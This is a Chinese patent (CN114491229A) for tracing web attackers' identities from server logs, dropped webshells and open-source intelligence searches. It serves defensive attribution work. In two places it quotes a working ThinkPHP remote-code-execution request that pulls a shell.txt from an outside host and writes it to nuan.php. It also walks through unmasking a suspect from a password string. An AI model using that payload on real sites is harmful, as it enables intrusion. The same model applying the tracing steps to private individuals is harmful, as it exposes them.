CN114491229A - 攻击者的身份溯源方法、装置、设备、存储介质和程序 - Google Patents

Abstract

本发明实施例提供一种攻击者的身份溯源方法、装置、设备、存储介质和程序。该方法包括：从日志信息中提取攻击者的访问请求记录；根据所述攻击者的访问请求记录，确定所述攻击者使用的漏洞；根据所述攻击者使用的漏洞，获取脚本木马文件，并根据所述脚本木马文件获取所述攻击者使用的身份特征信息；利用开源网络情报OSINT对所述身份特征信息进行搜索，并利用搜索结果确定出所述攻击者的身份信息。上述进行身份溯源的方案中效率较高。

Description

攻击者的身份溯源方法、装置、设备、存储介质和程序

技术领域

本发明涉及计算机技术领域，尤其涉及一种攻击者的身份溯源方法、装置、设备、存储介质和程序。

背景技术

科技给人们的生活带来便利的同时也给我们带来不少安全隐患。当前，终端设备很容易遭受恶意攻击，而攻击者被查处的难度却很大。

目前在黑客入侵事件中，通过对日志进行分析后，确认攻击者的IP在什么时间段做了什么事情，根据攻击者IP通过运营商进行调查取证，再次分析运营商提供的数据确认攻击者的真实身份。上述过程一般会耗费较长时间，因此效率较低。

发明内容

针对现有技术中的问题，本发明实施例提供一种攻击者的身份溯源方法、装置、设备、存储介质和程序。

具体地，本发明实施例提供了以下技术方案：

第一方面，本发明实施例提供了一种攻击者的身份溯源方法，包括：

从日志信息中提取攻击者的访问请求记录；

根据所述攻击者的访问请求记录，确定所述攻击者使用的漏洞；

根据所述攻击者使用的漏洞，获取脚本木马文件，并根据所述脚本木马文件获取所述攻击者使用的身份特征信息；

利用开源网络情报OSINT对所述身份特征信息进行搜索，并利用搜索结果确定出所述攻击者的身份信息。

可选地，所述从日志信息中提取攻击者的访问请求记录，包括：

根据所述日志信息，确定所述攻击者的IP地址；

根据所述攻击者的IP地址，从所述日志信息中提取所述攻击者的访问请求记录。

可选地，所述根据所述攻击者的访问请求记录，确定所述攻击者使用的漏洞，包括：

根据预设的漏洞类型以及漏洞类型对应的访问请求特征，从所述攻击者的访问请求记录中提取所述攻击者利用漏洞攻击的访问请求记录；

根据所述攻击者利用漏洞攻击的访问请求记录，确定所述攻击者使用的漏洞。

可选地，所述根据所述脚本木马文件获取所述攻击者使用的身份特征信息，包括：

根据所述脚本木马文件的访问记录，访问所述脚本木马文件的地址得到代码内容；

从所述代码内容中提取所述身份特征信息。

可选地，所述利用搜索结果确定出所述攻击者的身份信息，包括：

利用白名单方式将所述搜索结果进行筛选，得到可疑身份信息；

根据所述可疑身份信息以及攻击者的攻击信息，确定出所述攻击者的身份信息；所述攻击信息为从所述日志信息中得到的。

可选地，所述方法还包括：

根据所述日志信息，利用正则匹配方式获取可疑页面信息；

利用搜索引擎缓存的访问记录以及所述可疑页面信息，访问所述可疑页面，从所述可疑页面中获取所述攻击者的联系方式；

根据所述攻击者利用漏洞攻击的访问请求记录，获取所述攻击者的攻击行为信息，所述攻击行为信息包括以下至少一项：攻击行为、攻击时间、IP地址；

其中，所述攻击者的攻击信息包括以下至少一项：所述攻击者的联系方式或所述攻击行为信息。

可选地，所述方法还包括：

利用所述OSINT以及所述攻击者的身份信息确认所述攻击者是否为目标攻击者。

第二方面，本发明实施例还提供了一种攻击者的身份溯源装置，包括：

提取模块，用于从日志信息中提取攻击者的访问请求记录；

确定模块，用于根据所述攻击者的访问请求记录，确定所述攻击者使用的漏洞；

所述提取模块，还用于根据所述攻击者使用的漏洞，获取脚本木马文件，并根据所述脚本木马文件获取所述攻击者使用的身份特征信息；

处理模块，用于利用开源网络情报OSINT对所述身份特征信息进行搜索，并利用搜索结果确定出所述攻击者的身份信息。

第三方面，本发明实施例还提供了一种电子设备，包括存储器、处理器及存储在存储器上并可在处理器上运行的计算机程序，所述处理器执行所述程序时实现如第一方面所述攻击者的身份溯源方法的步骤。

第四方面，本发明实施例还提供了一种非暂态计算机可读存储介质，其上存储有计算机程序，该计算机程序被处理器执行时实现如第一方面所述攻击者的身份溯源方法的步骤。

第五方面，本发明实施例还提供了一种计算机程序产品，其上存储有可执行指令，该指令被处理器执行时使处理器实现第一方面所述攻击者的身份溯源方法的步骤。

本发明实施例提供的攻击者的身份溯源方法、装置、设备、存储介质和程序，从日志信息中提取攻击者的访问请求记录；从攻击者的访问请求记录中筛选出使用漏洞攻击的访问请求记录，进而可以确定出攻击者使用的漏洞；根据攻击者使用的漏洞，获取网站执行过程中写入的脚本木马文件，并根据脚本木马文件获取攻击者使用的身份特征信息；进一步，利用开源网络情报OSINT对身份特征信息进行搜索，并利用搜索结果确定出攻击者的身份信息。上述进行身份溯源的方案中相比利用日志信息通过运营商进行调查取证，效率较高。

附图说明

为了更清楚地说明本发明实施例或现有技术中的技术方案，下面将对实施例或现有技术描述中所需要使用的附图作一简单地介绍，显而易见地，下面描述中的附图是本发明的一些实施例，对于本领域普通技术人员来讲，在不付出创造性劳动的前提下，还可以根据这些附图获得其他的附图。

图1为本发明提供的攻击者的身份溯源方法的一实施例的流程示意图；

图2为本发明提供的攻击者的身份溯源方法的一实施例的搜索示意图；

图3为本发明提供的攻击者的身份溯源方法的一实施例的搜索结果示意图；

图4为本发明提供的攻击者的身份溯源方法的一实施例的可疑页面示意图；

图5是本发明提供的攻击者的身份溯源装置一实施例的结构示意图；

图6是本发明提供的电子设备一实施例的结构示意图。

具体实施方式

为使本发明实施例的目的、技术方案和优点更加清楚，下面将结合本发明实施例中的附图，对本发明实施例中的技术方案进行清楚、完整地描述，显然，所描述的实施例是本发明一部分实施例，而不是全部的实施例。基于本发明中的实施例，本领域普通技术人员在没有作出创造性劳动前提下所获得的所有其他实施例，都属于本发明保护的范围。

首先对本发明实施例的名词进行解释：

开源网络情报OSINT，是一种情报搜集手段，从各种公开的信息资源中寻找和获取有价值的情报。

溯源是指在网络安全中指寻找出安全事件攻击的源头。

本发明实施例的方法可以应用于对网络攻击的溯源场景中。

目前在黑客入侵事件中，通过对日志进行分析后，确认攻击者的IP在什么时间段做了什么事情，根据攻击者IP通过运营商进行调查取证，再次分析运营商提供的数据确认攻击者的真实身份。上述过程会耗费较长时间，使得身份溯源过程的效率较低。

下面的实施例均以电子设备为执行主体进行说明。下面结合图2-图5以具体的实施例对本发明的技术方案进行详细说明。下面这几个具体的实施例可以相互结合，对于相同或相似的概念或过程可能在某些实施例不再赘述。

图2是本发明实施例提供的攻击者的身份溯源方法一实施例的流程示意图。如图2所示，本发明实施例提供的方法，包括：

步骤101、从日志信息中提取攻击者的访问请求记录；

具体的，获取日志信息，利用日志信息可以进一步获取到攻击者的访问请求记录，例如从日志信息中找出短期内访问较多的可疑页面，例如访问次数较多的访问请求记录中对应的IP即可以作为攻击者的IP。进一步，利用攻击者的IP，从日志信息中提取该攻击者的所有访问请求记录。

步骤102、根据攻击者的访问请求记录，确定攻击者使用的漏洞；

具体的，分析该攻击者的访问请求记录，筛选出攻击者利用漏洞成功攻击的访问请求记录，并确定出攻击者使用的漏洞。

其中，漏洞指网站漏洞，例如，在日志中有记录的常见漏洞类型有：SQL注入攻击、跨站脚本攻击、任意文件上传漏洞攻击、任意文件下载漏洞攻击、远程命令\代码执行漏洞等。

不同的漏洞攻击方式具有不同的访问请求特征，因此，基于常见的漏洞类型可以确定攻击者使用的漏洞是哪种类型。

步骤103、根据攻击者使用的漏洞，获取脚本木马文件，并根据所述脚本木马文件获取攻击者使用的身份特征信息。

具体的，根据攻击者使用的漏洞，发现脚本木马文件，一般脚本目标文件为攻击者利用漏洞，并根据该脚本木马文件获取攻击者使用的身份特征信息，例如可以从该脚本木马文件中提取身份特征信息，在实际应用中，攻击者可能会对脚本木马文件进行清理，因此可以利用该脚本木马文件的网址，获取攻击者使用的身份特征信息，例如为密码信息hxq991217。

例如，通过日志信息发现攻击者使用的漏洞是thinkphp远程命令\代码执行漏洞，该漏洞是需要在一台远程服务器中部署一个后缀为“.txt”的可读文件，攻击者在有该漏洞的网站上构造特殊请求链接(特殊请求链接例如：

https://www.dldxdyfsyy.com//？a＝fetch&templateFile＝public/index&prefix＝″&content＝<php>file_put_contents(′nuan.php′，file_get_contents(′http：//www.520yxsf.com/shell.txt′))；＜/php＞)，攻击者通过浏览器访问该特殊请求链接后，存在漏洞的网站会主动读取攻击者提前部署的恶意脚本木马文件http://www.520yxsf.com/shell.txt的内容并把内容写入到根目录下的nuan.php中，如果网站根目录不存在nuan.php，网站***会新建该nuan.php文件并写入恶意脚本木马文件的内容，例如可以直接访问远程脚本木马文件的地址“http://www.520yxsf.com/shell.txt”得到代码内容，例如<？php function(){******}；**********(‘hxq991217’)>，提取出身份特征信息“hxq991217”，或者从恶意脚本木马nuan.php文件中提取攻击者使用的身份特征信息“hxq991217”。

步骤104、利用开源网络情报OSINT对身份特征信息进行搜索，并利用搜索结果确定出攻击者的身份信息。

具体的，可以利用搜索引擎批量采集工具通过网络开源情报(OSINT)对身份特征信息“hxq991217”进行搜索，获取搜索结果，进一步可以对搜索结果进行筛选，最终结合日志信息中得到的攻击者的攻击信息，确定出所述攻击者的身份信息，其中，攻击信息例如包括以下至少一项：攻击行为、时间、IP地址和联系方式。

本实施例的方法，从日志信息中提取攻击者的访问请求记录；从攻击者的访问请求记录中筛选出使用漏洞攻击的访问请求记录，进而可以确定出攻击者使用的漏洞；根据攻击者使用的漏洞，获取网站执行过程中写入的脚本木马文件，并根据脚本木马文件获取攻击者使用的身份特征信息；进一步，利用开源网络情报OSINT对身份特征信息进行搜索，并利用搜索结果确定出攻击者的身份信息。上述进行身份溯源的方案中相比利用日志信息通过运营商进行调查取证，效率较高。

在一实施例中，步骤101可以通过如下方式实现：

根据日志信息，确定攻击者的IP地址；

根据攻击者的IP地址，从日志信息中提取攻击者的访问请求记录。

具体的，根据日志信息，利用正则匹配方式，确定访问次数较多的IP地址，例如某个IP地址对某个网站页面在短时间内访问次数较多，则将该IP地址确定为攻击者的IP地址，根据攻击者的IP地址，从日志信息中提取攻击者的访问请求记录。

其中，正则匹配方式可以是通过文本编辑器emeditor软件的正则匹配功能实现。

上述实施方式中，从较多日志信息中，可以提取到有效的攻击者的访问请求记录，效率较高。

在一实施例中，步骤102具体可以通过如下方式实现：

根据预设的漏洞类型以及漏洞类型对应的访问请求特征，从攻击者的访问请求记录中提取攻击者利用漏洞攻击的访问请求记录；

根据攻击者利用漏洞攻击的访问请求记录，确定攻击者使用的漏洞。

具体的，漏洞类型包括但不限于以下至少一项：SQL注入攻击、跨站脚本攻击、任意文件上传漏洞攻击、任意文件下载漏洞攻击、远程命令\代码执行漏洞。

不同的漏洞攻击方式具有不同的访问请求特征，即不同的漏洞类型对应不同的访问请求特征，因此可以从攻击者的访问请求记录中提取攻击者利用漏洞攻击的访问请求记录，进而确定出攻击者使用的漏洞。

例如，利用thinkphp的远程命令执行漏洞获取到网站权限，并上传文件hmseo.php，该文件为恶意脚本木马。

进一步，通过thinkphp漏洞，可以确定攻击者的访问请求记录中记录了使用payload(代码、脚本语言)攻击过目标站点，且存在nuan.php脚本木马文件。

上述实施方式中，通过预设的漏洞类型以及漏洞类型对应的访问请求特征，从攻击者的访问请求记录中提取攻击者利用漏洞攻击的访问请求记录，而且可以确定出攻击者使用的漏洞，实现方案简单，效率较高。

在一实施例中，步骤103中“获取所述攻击者使用的身份特征信息”具体可以采用如下方式实现：

根据所述脚本木马文件的访问记录，访问所述脚本木马文件的地址得到代码内容；

从所述代码内容中提取所述身份特征信息。

具体的，通过日志信息发现攻击者使用的漏洞是thinkphp远程命令\代码执行漏洞，该漏洞是需要在一台远程服务器中部署一个后缀为“.txt”的可读文件，攻击者在有该漏洞的网站上构造特殊请求链接(特殊请求链接例如：

https://www.dldxdyfsyy.com//？a＝fetch&templateFile＝public/index&prefix＝″&content＝<php>file_put_contents(′nuan.php′，file_get_contents(′http：//www.520yxsf.com/shell.txt′))；</php>)，攻击者通过浏览器访问该特殊请求链接后，存在漏洞的网站会主动读取攻击者提前部署的恶意脚本木马文件http：//www.520yxsf.com/shell.txt的内容并把内容写入到根目录下的nuan.php中，如果网站根目录不存在nuan.php，网站***会新建该nuan.php文件并写入恶意脚本木马文件的内容，例如可以直接访问远程脚本木马文件的地址“http://www.520yxsf.com/shell.txt”得到代码内容，例如<？php function(){******}；**********(‘hxq991217’)>，提取出身份特征信息“hxq991217”，或者从恶意脚本木马nuan.php文件中提取攻击者使用的身份特征信息“hxq991217”。

上述实施方式中，访问所述脚本木马文件的地址得到代码内容，从而从所述代码内容中提取所述身份特征信息，即能够获取到有用的身份特征信息，实现过程简单，效率较高。

在一实施例中，步骤104中“利用搜索结果确定出所述攻击者的身份信息”具体可以通过如下方式实现：

利用白名单方式将搜索结果进行筛选，得到可疑身份信息；

根据可疑身份信息以及攻击者的攻击信息，确定出攻击者的身份信息；攻击信息为从日志信息中得到的。

具体的，利用搜索引擎批量采集工具通过网络开源情报(OSINT)对身份特征信息“hxq991217”进行搜索，用网址白名单方式对搜索结果进行初步筛选，过滤掉白名单中的网址，剩下的搜索结果中具有可疑身份信息，然后结合已根据日志信息获取到的攻击信息，通过人工比对，确定出攻击者为可疑人员何某某，以及该可疑人员的身份信息。

如图2所示，利用搜索工具对身份特征信息“hxq991217”进行搜索，得到何某某的多个搜索结果，搜索结果1为某社交应用APP中的账号信息，搜索结果2为个人主页(具体如图3所示)以及搜索结果3-5。

其中搜索结果1和2与日志信息中得到的攻击信息相吻合，因此，基于搜索结果获取到该攻击者何某某的身份信息。

可选地，步骤104之后还包括如下步骤：

利用OSINT以及攻击者的身份信息确认攻击者是否为目标攻击者。

具体的，在确定出攻击者的身份信息后，可以进一步对该攻击者的身份进行确认，即是否为目标攻击者，例如通过网络开源情报OSINT分析该嫌疑人是否具备相关技术能力，以及是否长期从事相关工作。

进一步，利用图2中的搜索结果中可以发现该攻击者为一个黑客网站的会员，会员号为hxq991217。进而可以访问该黑客网站发现该攻击者在该网站上多次发帖，说明该攻击者的身份信息与该攻击者的实际身份吻合。

上述实施方式中，利用白名单方式将搜索结果进行筛选，得到可疑身份信息；进一步通过可疑身份信息与从日志信息中得到的攻击者的攻击信息进行对比，确定出攻击者的身份信息，可以确保溯源得出的攻击者的身份信息更加真实有效。

在一实施例中，该方法还包括如下步骤，即如何获取攻击者的攻击信息：

根据所述日志信息，利用正则匹配方式获取可疑页面信息；

利用搜索引擎缓存的访问记录以及所述可疑页面信息，访问所述可疑页面，从所述可疑页面中获取所述攻击者的联系方式；

根据所述攻击者利用漏洞攻击的访问请求记录，获取所述攻击者的攻击行为信息，所述攻击行为信息包括以下至少一项：攻击行为、攻击时间、IP地址；

其中，所述攻击者的攻击信息包括以下至少一项：所述攻击者的联系方式或所述攻击行为信息。

具体的，根据所述日志信息，利用正则匹配方式，例如使用文本编辑器emeditor利用正则匹配方式，获取访问的可疑页面信息；

从搜索引擎缓存的访问记录中找到所示可疑页面，并访问所述可疑页面，从所述可疑页面中获取所述攻击者的联系方式，一般情况下对身份溯源有用的信息为联系方式，网页中其他信息一般会通过网页脚本随机生成相关内容，但联系方式一般会使用真实的联系方式，例如社交应用的账号等。

其中，搜索引擎例如为网络开源情报***或搜索软件。

如图4所示，网页中多次出现某个联系方式。

可选地，分析访问请求记录确认攻击者利用漏洞成功攻击的访问请求记录，获取攻击者地攻击行为、时间、以及所使用的IP地址等攻击行为信息。

上述实施方式中，利用搜索引擎缓存的访问记录查找可疑页面，访问所述可疑页面，从所述可疑页面中获取所述攻击者的联系方式，该联系方式对身份溯源的作用较大，而且根据所述攻击者利用漏洞攻击的访问请求记录，获取所述攻击者的攻击行为信息，用于对攻击者身份的真实性进行确认，提高了身份溯源的准确性。

本发明实施例的方法，无需调证的情况下即可溯源出真实攻击者的身份，而且攻击者用境外代理服务也可以继续溯源出攻击者真实身份，无需受攻击服务器正在运行服务的限制，仍可溯源出攻击者真实身份。

下面对本发明实施例提供的攻击者的身份溯源装置进行描述，下文描述的分布式应用检测装置与上文描述的攻击者的身份溯源方法可相互对应参照。

图5是本发明提供的攻击者的身份溯源装置一实施例的结构示意图。如图5所示，本实施例提供的攻击者的身份溯源装置，包括：

提取模块110，用于从日志信息中提取攻击者的访问请求记录；

确定模块120，用于根据所述攻击者的访问请求记录，确定所述攻击者使用的漏洞；

所述提取模块110，还用于根据所述攻击者使用的漏洞，获取脚本木马文件，并根据所述脚本木马文件获取所述攻击者使用的身份特征信息；

处理模块130，用于利用开源网络情报OSINT对所述身份特征信息进行搜索，并利用搜索结果确定出所述攻击者的身份信息。

可选地，所述提取模块110，具体用于：

根据所述日志信息，确定所述攻击者的IP地址；

根据所述攻击者的IP地址，从所述日志信息中提取所述攻击者的访问请求记录。

可选地，所述确定模块120，具体用于：

根据预设的漏洞类型以及漏洞类型对应的访问请求特征，从所述攻击者的访问请求记录中提取所述攻击者利用漏洞攻击的访问请求记录；

根据所述攻击者利用漏洞攻击的访问请求记录，确定所述攻击者使用的漏洞。

可选地，所述提取模块110，具体用于：

根据所述脚本木马文件的访问记录，访问所述脚本木马文件的地址得到代码内容；

从所述代码内容中提取所述身份特征信息。

可选地，所述处理模块130，具体用于：

利用白名单方式将所述搜索结果进行筛选，得到可疑身份信息；

根据所述可疑身份信息以及攻击者的攻击信息，确定出所述攻击者的身份信息；所述攻击信息为从所述日志信息中得到的。

可选地，所述处理模块130，还用于：

根据所述日志信息，利用正则匹配方式获取可疑页面信息；

利用搜索引擎缓存的访问记录以及所述可疑页面信息，访问所述可疑页面，从所述可疑页面中获取所述攻击者的联系方式；

根据所述攻击者利用漏洞攻击的访问请求记录，获取所述攻击者的攻击行为信息，所述攻击行为信息包括以下至少一项：攻击行为、攻击时间、IP地址；

其中，所述攻击者的攻击信息包括以下至少一项：所述攻击者的联系方式或所述攻击行为信息。

可选地，所述处理模块130，还用于：

利用所述OSINT以及所述攻击者的身份信息确认所述攻击者是否为目标攻击者。

本发明实施例的装置，其用于执行前述任一方法实施例中的方法，其实现原理和技术效果类似，此次不再赘述。

举个例子如下：

图6示例了一种电子设备的实体结构示意图，如图6所示，该电子设备可以包括：处理器(processor)810、通信接口(Communications Interface)820、存储器(memory)830和通信总线840，其中，处理器810，通信接口820，存储器830通过通信总线840完成相互间的通信。处理器810可以调用存储器830中的逻辑指令，以执行如下方法。

此外，上述的存储器830中的逻辑指令可以通过软件功能单元的形式实现并作为独立的产品销售或使用时，可以存储在一个计算机可读取存储介质中。基于这样的理解，本发明的技术方案本质上或者说对现有技术做出贡献的部分或者该技术方案的部分可以以软件产品的形式体现出来，该计算机软件产品存储在一个存储介质中，包括若干指令用以使得一台计算机设备(可以是个人计算机，服务器，或者网络设备等)执行本发明各个实施例所述方法的全部或部分步骤。而前述的存储介质包括：U盘、移动硬盘、只读存储器(ROM，Read-Only Memory)、随机存取存储器(RAM，Random Access Memory)、磁碟或者光盘等各种可以存储程序代码的介质。

另一方面，本发明实施例还提供一种非暂态计算机可读存储介质，其上存储有计算机程序，该计算机程序被处理器执行时实现以执行上述各实施例提供的攻击者的身份溯源方法包括：从日志信息中提取攻击者的访问请求记录；根据所述攻击者的访问请求记录，确定所述攻击者使用的漏洞；根据所述攻击者使用的漏洞，获取脚本木马文件，并根据所述脚本木马文件获取所述攻击者使用的身份特征信息；利用开源网络情报OSINT对所述身份特征信息进行搜索，并利用搜索结果确定出所述攻击者的身份信息。

以上所描述的装置实施例仅仅是示意性的，其中所述作为分离部件说明的单元可以是或者也可以不是物理上分开的，作为单元显示的部件可以是或者也可以不是物理单元，即可以位于一个地方，或者也可以分布到多个网络单元上。可以根据实际的需要选择其中的部分或者全部模块来实现本实施例方案的目的。本领域普通技术人员在不付出创造性的劳动的情况下，即可以理解并实施。

通过以上的实施方式的描述，本领域的技术人员可以清楚地了解到各实施方式可借助软件加必需的通用硬件平台的方式来实现，当然也可以通过硬件。基于这样的理解，上述技术方案本质上或者说对现有技术做出贡献的部分可以以软件产品的形式体现出来，该计算机软件产品可以存储在计算机可读存储介质中，如ROM/RAM、磁碟、光盘等，包括若干指令用以使得一台计算机设备(可以是个人计算机，服务器，或者网络设备等)执行各个实施例或者实施例的某些部分所述的方法。

最后应说明的是：以上实施例仅用以说明本发明的技术方案，而非对其限制；尽管参照前述实施例对本发明进行了详细的说明，本领域的普通技术人员应当理解：其依然可以对前述各实施例所记载的技术方案进行修改，或者对其中部分技术特征进行等同替换；而这些修改或者替换，并不使相应技术方案的本质脱离本发明各实施例技术方案的精神和范围。

Claims (11)

1.一种攻击者的身份溯源方法，其特征在于，包括：

从日志信息中提取攻击者的访问请求记录；

根据所述攻击者的访问请求记录，确定所述攻击者使用的漏洞；

根据所述攻击者使用的漏洞，获取脚本木马文件，并根据所述脚本木马文件获取所述攻击者使用的身份特征信息；

利用开源网络情报OSINT对所述身份特征信息进行搜索，并利用搜索结果确定出所述攻击者的身份信息。

2.根据权利要求1所述的攻击者的身份溯源方法，其特征在于，所述从日志信息中提取攻击者的访问请求记录，包括：

根据所述日志信息，确定所述攻击者的IP地址；

根据所述攻击者的IP地址，从所述日志信息中提取所述攻击者的访问请求记录。

3.根据权利要求1或2所述的攻击者的身份溯源方法，其特征在于，所述根据所述攻击者的访问请求记录，确定所述攻击者使用的漏洞，包括：

根据预设的漏洞类型以及漏洞类型对应的访问请求特征，从所述攻击者的访问请求记录中提取所述攻击者利用漏洞攻击的访问请求记录；

根据所述攻击者利用漏洞攻击的访问请求记录，确定所述攻击者使用的漏洞。

4.根据权利要求1或2所述的攻击者的身份溯源方法，其特征在于，所述根据所述脚本木马文件获取所述攻击者使用的身份特征信息，包括：

根据所述脚本木马文件的访问记录，访问所述脚本木马文件的地址得到代码内容；

从所述代码内容中提取所述身份特征信息。

5.根据权利要求1或2所述的攻击者的身份溯源方法，其特征在于，所述利用搜索结果确定出所述攻击者的身份信息，包括：

利用白名单方式将所述搜索结果进行筛选，得到可疑身份信息；

根据所述可疑身份信息以及攻击者的攻击信息，确定出所述攻击者的身份信息；所述攻击信息为从所述日志信息中得到的。

6.根据权利要求1或2所述的攻击者的身份溯源方法，其特征在于，所述方法还包括：

根据所述日志信息，利用正则匹配方式获取可疑页面信息；

利用搜索引擎缓存的访问记录以及所述可疑页面信息，访问所述可疑页面，从所述可疑页面中获取所述攻击者的联系方式；

根据所述攻击者利用漏洞攻击的访问请求记录，获取所述攻击者的攻击行为信息，所述攻击行为信息包括以下至少一项：攻击行为、攻击时间、IP地址；

其中，所述攻击者的攻击信息包括以下至少一项：所述攻击者的联系方式或所述攻击行为信息。

7.根据权利要求1或2所述的攻击者的身份溯源方法，其特征在于，所述方法还包括：

利用所述OSINT以及所述攻击者的身份信息确认所述攻击者是否为目标攻击者。

8.一种攻击者的身份溯源装置，其特征在于，包括：

提取模块，用于从日志信息中提取攻击者的访问请求记录；

确定模块，用于根据所述攻击者的访问请求记录，确定所述攻击者使用的漏洞；

所述提取模块，还用于根据所述攻击者使用的漏洞，获取脚本木马文件，并根据所述脚本木马文件获取所述攻击者使用的身份特征信息；

处理模块，用于利用开源网络情报OSINT对所述身份特征信息进行搜索，并利用搜索结果确定出所述攻击者的身份信息。

9.一种电子设备，包括存储器、处理器及存储在存储器上并可在处理器上运行的计算机程序，其特征在于，所述处理器执行所述程序时实现如权利要求1至7任一项所述攻击者的身份溯源方法的步骤。

10.一种非暂态计算机可读存储介质，其上存储有计算机程序，其特征在于，该计算机程序被处理器执行时实现如权利要求1至7任一项所述攻击者的身份溯源方法的步骤。

11.一种计算机程序产品，其上存储有可执行指令，其特征在于，该指令被处理器执行时使处理器实现如权利要求1至7中任一项所述攻击者的身份溯源方法的步骤。

Images